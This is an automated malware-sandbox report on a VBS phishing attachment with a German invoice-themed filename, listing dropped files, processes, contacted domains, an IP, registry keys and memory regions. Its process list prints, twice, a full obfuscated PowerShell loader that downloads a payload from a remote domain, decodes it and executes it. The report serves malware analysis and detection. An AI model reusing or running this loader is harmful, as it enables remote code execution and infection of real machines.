IOC Report
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs

loading gif

Files

File Path
Type
Category
Malicious
Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l30usody.dgt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeygavsh.bih.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qltk43lb.rg3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ur1ensrl.2se.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Kinetoplast.Liq
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs"
malicious
C:\Windows\System32\PING.EXE
ping gormezl_6777.6777.6777.677e
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Inspeaking Overpratice Hreapparater Heteroscian #>;$Filibusterous='Koordinatvrdiernes';<#Panhygrous Procurer Cantors Emeraldine #>;$Husklike=$Erhvervsaffaldets+$host.UI; function Lymnaeid($Simonize){If ($Husklike) {$Methodisty++;}$Minimumstermometeret=$Knaster+$Simonize.'Length'-$Methodisty; for( $Pales=4;$Pales -lt $Minimumstermometeret;$Pales+=5){$Postcardinal=$Pales;$Dekompressionen+=$Simonize[$Pales];$underbreeding='Helstegte';}$Dekompressionen;}function Orfrays($Advolution){ .($Landbetjents) ($Advolution);}$originate=Lymnaeid 'UnsuMAntiokampzBlegi R,nlBerelHobbaCo p/ run ';$originate+=Lymnaeid 'fors5Kjel.Thom0F,rb Nama(KaprW UnfiNo onDueldS,jdolagowMil,sObsc SixpN UndTPoly Skri1 Dyb0rigs.Toko0Scia;Unde BullWUnpri IndnNont6 Res4Soci;lind AminxBlya6Hngs4met.;rlin CaprfolkvLizz:Egoi1Tand3Fest1Anta. .al0 Fi )Cl.p JogG yrkedecoc.orbkG.aso fej/ Kir2Skil0erek1 ob0 c,n0Myon1Prod0Ddss1Acqu PumFAt,li .lorIndieHus fDeloo Im,xBena/Tha 1Colo3S ip1Pap . git0 Tre ';$Vgtighedens=Lymnaeid 'Erh.u Bous D fE Currunbl-parka P,pgstate axnBibltFore ';$Adaptively=Lymnaeid ' trh Bist Cont An pFares B,l:Agen/Rund/KvaloDeforC ratStabhBruloVe biBo,smOutspSolfl.kdea BaanSnontDeckcBuc eSokknVerdt U,eeNondrFire.arkarNldeoTech/CarbBPageeB.rtsSlabtDobbyPolir HeleUn.etBed,.squaoMirkc Uncximcn ';$Reformbevgelser=Lymnaeid 'Pre,>R,ma ';$Landbetjents=Lymnaeid 'Ma ci,atoE impxS.rv ';$Befolk='lousin';$Vitalizings='\Kinetoplast.Liq';Orfrays (Lymnaeid 'Patr$BrysgUnpol So OKronB UpsaS iklLulu: icho Pr.dU,naI Sy SAlloEkatarprecELevi=Rede$Do re SalnKlikvChef:lynnAMa opFluoPS msdKamea,nddtE eraPyro+Foto$ Vr.vNadvI OphT ilmA Letl ,idiSubtzBawdiDy en Re GMilkSBr.t ');Orfrays (Lymnaeid ' S r$af rg,pspLDr,aOOpfoBCo ca UndlTe r:Hyp.dHun.O,remBUnspbnar ENamel Maht HiehUnchENedsdUpereRabaRFossN LogE a bsSham= r c$Di kALyttdDrataTiggP DeitTvanIScanVD maeRom L,odsYAnan.MegasTradpb dqlUdgiIune.T J n(Tr a$Srnur eaueAngeF Fo.OGradr VelMEst,b ileDatav Gu.GRetoEC.njLPhansSjleE Tonr Ecd)G ln ');Orfrays (Lymnaeid ' Svm[HespNEuklE bnetHest.BackSF dsEPolyRVic vConsIKultCEnduE egiPKonkoGrypiSmaaNAaret RhymKulmAGennnanalA L aGM,skekonfrairm] Lux: D.k:Nonms Di.EOverc OveUDispRCaviIActutJuryyBygnpRin,RGrimoM.eaTOpdaoDuoeCHudiOManiLUn n Farv=E,te Brug[ UndnTungeRigsTSky .BilcSR goE AttcSw,euKorrrCaphi Kikt andYNavnpBlokREk io Armt AmaoO,nocspoooU,trl Ma.TC viY.rogPMyste U y]Hal :Chin:AlahtEm,iL EncSDepe1Udda2Az m ');$Adaptively=$Dobbelthedernes[0];$Udbyttebehandling=(Lymnaeid ' Lea$DrilGPneuLHoteOBeneBSem.aNdeslPyic:PuliG kniYDiscM F gNSk mAfamisKvisIThigUD.ntmSimu=BrugnPeleE.aboW imr-UnsooAk ibPoliJ,dpoeTolvCS riTAgro AsmasSk iYMastsNonotimpeEquo MSu c.antinImprEKabuTPaa,. BygwVandESligBOutpCInd LBoliidiasEGramn AffTBe,i ');Orfrays ($Udbyttebehandling);Orfrays (Lymnaeid 'Vu g$RevoG nimy JagmRykknDiglachrisAktii wrouTra mSa,o.af.eH oopeEnroaOstrd Mone storArtis cle[Hand$TypeV EksgNsketGrshi Indg AuthUneqekampd K ne lufnPol s Paa]Unma=Helv$ S ro P.erRan iTricgHotei SunnOuttaJerntSkare ygi ');$Praege=Lymnaeid 'Forl$.denG MeeyChapmBlitns.staoutrsOpdyi SpeuAfblmKoll. RusDIneqoN nfwSupenTaarlKommoteglaPsykd AmeF Humi Surl EskeS,em(Vesi$ LanAg.itdU koaFortp Ta tSprii C.avState E.tlDopey Klo, Sel$ Ap cad ehConceMatheSusts Ho e Ge mpolio counPrergTraue SkarPreei KvanAmt,gP ed)Abse ';$cheesemongering=$Odisere;Orfrays (Lymnaeid ' Cen$UnfogS raLReceOPermBcel.aUkvalLevi: Kd RAa sEs.ollUne,A imltAddiiDansvBrusEUndetLed S Med= ,er( StiTDenoESlagsrootTurte-frigpPhalaWil TOverHglyc Hush$P vecSoveHTrumeManke iblS TriEPrecm SamO R pn E kgBogsEUngurAdreiTwe nPreigBo t)Sol ');while (!$Relativets) {Orfrays (Lymnaeid ' van$IndsgUndelS,nsoVibrbFolkaPo,yl A.p:vandSF yvcRakeuWinit,lbaiInkobjupor ffia Joun,mascG nahAllei ForaHead=En o$Tetrt SvorVr guSamkeTamb ') ;Orfrays $Praege;Orfrays (Lymnaeid ',ondsKorntHjerAwhi R Hidt ara-Ca tSHaevlSaksE,nineJ erpPenn Rot4Tele ');Orfrays (Lymnaeid 'Eksa$SquiG NonlSippO etbTiliAParilMist:KeyeR enaeTherlOpslaUndet .agi Catv U.meRkketB ags ann=Haan(G osTForrETurbSBlysTIceq- S.mpAfkaAUndetRecaHGirn Sig$ optCBarbhB ckeCem eSimiSJensEHutcMKjolo Supn,xiogPl dESen.rAnt iBr mNPr fGUn.a)inte ') ;Orfrays (Lymnaeid ' Pro$BestgLugtLPallOPro BAfteABlokLP rt:StivtTeleOH,veRLotht VarUBlocRgrafR Klbe FlidOvals P,rK,visaStvlBPalmeTrk,RRrgtnRdl eLive= For$ExhiGUnshl JamONysgBAfdeaUnflLAbst:SuitRInteY s tT BriTIntoEUn ursvarSAbonkJerseArriREmignUd.ae Ove+ .ac+ Ov.%B an$JantDMentOMarcbKameBBl,vE ModL ProtKhelH Faketrstd None Shyr.einN vinefortSPant.EndecagroOInwrUBra N,nsttAvli ') ;$Adaptively=$Dobbelthedernes[$Torturredskaberne];}$Raatret=335849;$Afft=30088;Orfrays (Lymnaeid 'Vag.$UdlngFablL P eOTh wbOmniaPerklfeud: ranMU ilIWi tLMetaJ lmobCopuEUdklS .obkLandy FalTTr ntSasheSteml aulsDoorEKontSPreaSSpooeBrneKHypstUlykO ConrSkri ear,= dou orsGKlimeKultT Eu -PunnCBilaOCo tNIslnTGrovE tarn C,ptskyd Stat$LnfrCTen hDireeAffeEReinsCercE esaMMaleOFluoN onsGRoseEPlairStavi npaNBenhg Ego ');Orfrays (Lymnaeid 'Peri$Embrg QuilSu.foBallbFod a AdelF rb:HabrV autigebermaniiRekrdLoveiJensgrecoeOpdrnEfteo Benu GossHors Heli=hous Krop[SionSRepryAlonsErintK,seeD ffmBest.Bes,CCentoEmannVennv skee RecrSpintD.ms] Und:Falc:NummFStasr Ejeo FalmDvalBproraVedlsAcroeBeed6V by4 ChrSOmskt ForrPolsiFolknOverg Pr (Pels$BedyMDikki F.rl orjFordbBorse IldsDrunkL neyLungt Sp t FraeVu.glT.ansOmste PresSquosI tre FibkBiblt uloCaderBom ) Zoo ');Orfrays (Lymnaeid ' Kom$ Ba gFleelOrgaO amsbHe,eaDobblDo n:BagtY isln,eunkDalrSLotho ccoMIfres,erotSve Ktti=,yrr seu[Precs H sYFo ksRistTJunkeAfklmPyro.raasTEftee RegxNedvtShun. Arme.nfenKatnCkindoMangdLepti k inMariG na]Over:Nonc:KalaAK,glsPimpcAdeaIkermI Lie.RumngF lse M ktAntesBlo,TManirExpoiAlien E sG Min(Inc $E,epvKolliAngiR ajiAnlgd gneIWilegUddiEHy,eNSi koKommuMi is G a)Verf ');Orfrays (Lymnaeid 'Stro$NonsGBispl ejogirabPe oaSpisl iml:LangTLam H ForaKardnPrefa .oyTBi loHudaLDarkONoncg ubm=Taal$ReviY adeNPallK Tras G eOS arMForsS Po,TM rp. scasBesmuUnnaBSkjosEn.iTInterCav.IvrtsNGa.mG Unw(.rev$GymnrSubcAA toAUndeTAstrR Br.eDesutBog ,Inte$MythaForrfAva,Frailt Vil) Rub ');Orfrays $Thanatolog;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://nuget.org/NuGet.exe
unknown
http://crl.micro
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://aka.ms/pscore6lB_q
unknown
https://orthoimplantcenter.ro
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://orthoimplantcenter.ro
unknown
https://orthoimplantcenter.ro/Bestyret.ocx
188.241.183.45
https://aka.ms/pscore68
unknown
http://wicroft.com
unknown
https://orthoimplantcenter.ro/Bestyret.ocxXR1lX
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 8 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
gormezl_6777.6777.6777.677e
unknown
malicious
bg.microsoft.map.fastly.net
199.232.214.172
orthoimplantcenter.ro
188.241.183.45

IPs

IP
Domain
Country
Malicious
188.241.183.45
orthoimplantcenter.ro
Romania

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
5F1A000
trusted library allocation
page read and write
malicious
95EB000
direct allocation
page execute and read and write
malicious
1DE999BE000
trusted library allocation
page read and write
malicious
8A40000
direct allocation
page execute and read and write
malicious
356B000
heap
page read and write
1B470DC3000
heap
page read and write
1B834FB000
stack
page read and write
1B470C95000
heap
page read and write
1B470C72000
heap
page read and write
7FFE7E150000
trusted library allocation
page read and write
7FFE7E110000
trusted library allocation
page read and write
4EC7000
trusted library allocation
page read and write
1B470B27000
heap
page read and write
1B470C80000
heap
page read and write
926FEBE000
stack
page read and write
7FFE7DF9C000
trusted library allocation
page execute and read and write
8427000
stack
page read and write
73C0000
heap
page read and write
1DE87F9F000
heap
page read and write
73D0000
heap
page read and write
1B470C21000
heap
page read and write
1B470B43000
heap
page read and write
32C0000
heap
page read and write
1B827FA000
stack
page read and write
7FFE7E250000
trusted library allocation
page read and write
1B46EE01000
heap
page read and write
1B470CD0000
heap
page read and write
1DE897E0000
trusted library allocation
page read and write
1DE87E30000
heap
page read and write
1B470D71000
heap
page read and write
3130000
trusted library allocation
page read and write
9410000
direct allocation
page execute and read and write
3170000
heap
page readonly
3120000
trusted library allocation
page read and write
4D60000
heap
page read and write
791E000
stack
page read and write
8780000
trusted library allocation
page read and write
1DEA2092000
heap
page read and write
1B46EE35000
heap
page read and write
1B470CD8000
heap
page read and write
1DE89E43000
trusted library allocation
page read and write
7FFE7E230000
trusted library allocation
page read and write
1B46EE62000
heap
page read and write
1DE89DE9000
trusted library allocation
page read and write
3114000
trusted library allocation
page read and write
1DE8B6F4000
trusted library allocation
page read and write
1B470CD7000
heap
page read and write
1DE89951000
trusted library allocation
page read and write
1DEA20B6000
heap
page read and write
926FF3E000
stack
page read and write
8A10000
trusted library allocation
page read and write
5F01000
trusted library allocation
page read and write
1B82BFE000
stack
page read and write
1DE8B6CB000
trusted library allocation
page read and write
7FFE7E200000
trusted library allocation
page read and write
1DEA213E000
heap
page read and write
1DE8A04A000
trusted library allocation
page read and write
1B470C57000
heap
page read and write
313A000
trusted library allocation
page execute and read and write
85A4000
heap
page read and write
3100000
trusted library allocation
page read and write
1B470B53000
heap
page read and write
7FFE7E0C2000
trusted library allocation
page read and write
1B470C80000
heap
page read and write
1B470CA9000
heap
page read and write
1A59FE60000
heap
page read and write
1DE87F5A000
heap
page read and write
1DEA1E50000
heap
page read and write
1B470CDD000
heap
page read and write
8A20000
trusted library allocation
page read and write
1B470B53000
heap
page read and write
8AF0000
direct allocation
page read and write
1B470C78000
heap
page read and write
7FFE7DF90000
trusted library allocation
page read and write
1B82EFF000
stack
page read and write
533E000
trusted library allocation
page read and write
1B470CA5000
heap
page read and write
8560000
heap
page read and write
7FFE7E180000
trusted library allocation
page read and write
1B470B6F000
heap
page read and write
1B470C57000
heap
page read and write
7FFE7E220000
trusted library allocation
page read and write
7A10000
trusted library allocation
page read and write
1DEA2174000
heap
page read and write
1B470B3F000
heap
page read and write
1DE87F9D000
heap
page read and write
1A59FD60000
heap
page read and write
1B470DF1000
heap
page read and write
1B470C80000
heap
page read and write
335F000
heap
page read and write
7FFE7E260000
trusted library allocation
page read and write
1DE881C5000
heap
page read and write
1DEA2068000
heap
page read and write
1B470CE3000
heap
page read and write
32CC000
heap
page read and write
7FFE7E1B0000
trusted library allocation
page read and write
3180000
heap
page read and write
8A50000
trusted library allocation
page read and write
7FFE7E0E0000
trusted library allocation
page read and write
1B470C72000
heap
page read and write
1B470CF9000
heap
page read and write
1DE87F64000
heap
page read and write
1B470C95000
heap
page read and write
1B470C80000
heap
page read and write
1DE99C39000
trusted library allocation
page read and write
1B830FC000
stack
page read and write
7FFE7E0B0000
trusted library allocation
page execute and read and write
8510000
trusted library allocation
page read and write
1B470D20000
heap
page read and write
9270B0D000
stack
page read and write
7FFE7E080000
trusted library allocation
page read and write
1B470B4F000
heap
page read and write
7FFE7E1F0000
trusted library allocation
page read and write
76BF000
heap
page read and write
1B470C46000
heap
page read and write
8950000
heap
page read and write
7FFE7E140000
trusted library allocation
page read and write
7980000
trusted library allocation
page read and write
1DE8A503000
trusted library allocation
page read and write
7FFE7E09A000
trusted library allocation
page read and write
7FFE7E091000
trusted library allocation
page read and write
1B470B33000
heap
page read and write
1DE881A0000
heap
page readonly
1B470CDA000
heap
page read and write
927003C000
stack
page read and write
4D1E000
stack
page read and write
8440000
trusted library allocation
page read and write
1B470B27000
heap
page read and write
7630000
heap
page read and write
7A00000
trusted library allocation
page read and write
1DE89947000
heap
page read and write
7761000
heap
page read and write
5F15000
trusted library allocation
page read and write
1B470C80000
heap
page read and write
1B470C95000
heap
page read and write
8A30000
trusted library allocation
page read and write
1B470C97000
heap
page read and write
1DE87F62000
heap
page read and write
1B46EDBC000
heap
page read and write
1B470B3A000
heap
page read and write
1DEA2064000
heap
page read and write
1B46EDFF000
heap
page read and write
9270B8B000
stack
page read and write
7FFE7E0C5000
trusted library allocation
page read and write
1B470C92000
heap
page read and write
7260000
heap
page execute and read and write
3185000
heap
page read and write
1DEA23B0000
heap
page read and write
855B000
trusted library allocation
page read and write
1B470CA9000
heap
page read and write
1DEA205C000
heap
page read and write
1B46EF40000
heap
page read and write
1B470B21000
heap
page read and write
1B46ED79000
heap
page read and write
311D000
trusted library allocation
page execute and read and write
1DE89B78000
trusted library allocation
page read and write
1B470B6F000
heap
page read and write
1B470C53000
heap
page read and write
3560000
heap
page read and write
1B470CA9000
heap
page read and write
1B470D21000
heap
page read and write
1B46ED99000
heap
page read and write
1B46EBD0000
heap
page read and write
7670000
heap
page read and write
1B46EEA0000
remote allocation
page read and write
1B470CF9000
heap
page read and write
1B831FF000
stack
page read and write
1B470CA5000
heap
page read and write
1B470C80000
heap
page read and write
1DE87F10000
heap
page read and write
1DE89945000
heap
page read and write
7FFE7DFC6000
trusted library allocation
page execute and read and write
1DE99971000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
1B470B28000
heap
page read and write
1B470CE3000
heap
page read and write
4D5E000
stack
page read and write
1B46EDE9000
heap
page read and write
1B46EE1F000
heap
page read and write
1DE99960000
trusted library allocation
page read and write
1B470B23000
heap
page read and write
4134CFF000
unkown
page read and write
1B470B27000
heap
page read and write
1B470C72000
heap
page read and write
1B470B23000
heap
page read and write
85ED000
heap
page read and write
1B470B26000
heap
page read and write
7258000
trusted library allocation
page read and write
1B46EF48000
heap
page read and write
75DE000
stack
page read and write
4134C7B000
stack
page read and write
1DE899D5000
trusted library allocation
page read and write
1DE99951000
trusted library allocation
page read and write
7FFE7E0F0000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
1B470C38000
heap
page read and write
1B470CA5000
heap
page read and write
1B470CA5000
heap
page read and write
7DF4E7210000
trusted library allocation
page execute and read and write
1B46EE62000
heap
page read and write
85BB000
heap
page read and write
9270A88000
stack
page read and write
1DEA1F03000
heap
page read and write
926FD38000
stack
page read and write
3550000
trusted library allocation
page read and write
1B470CD1000
heap
page read and write
1B470B4A000
heap
page read and write
326C000
stack
page read and write
7FFE7E0D0000
trusted library allocation
page execute and read and write
926FDBC000
stack
page read and write
8430000
trusted library allocation
page read and write
8530000
trusted library allocation
page read and write
1DE8AD57000
trusted library allocation
page read and write
1B470CA9000
heap
page read and write
1B470C72000
heap
page read and write
926F9FC000
stack
page read and write
79D0000
trusted library allocation
page read and write
1DE8A4E1000
trusted library allocation
page read and write
1B470CBF000
heap
page read and write
1B470B6F000
heap
page read and write
1B470CA9000
heap
page read and write
1DE87D50000
heap
page read and write
1DE89810000
trusted library allocation
page read and write
8570000
heap
page read and write
1B470C72000
heap
page read and write
7FFE7E170000
trusted library allocation
page read and write
1B470C72000
heap
page read and write
1B470C80000
heap
page read and write
9270C0B000
stack
page read and write
8B30000
trusted library allocation
page execute and read and write
3110000
trusted library allocation
page read and write
4DD2000
trusted library allocation
page read and write
1B470B24000
heap
page read and write
1B470C46000
heap
page read and write
926F5F3000
stack
page read and write
BC8000
stack
page read and write
926F97E000
stack
page read and write
1B832FE000
stack
page read and write
1B470C21000
heap
page read and write
8AE0000
direct allocation
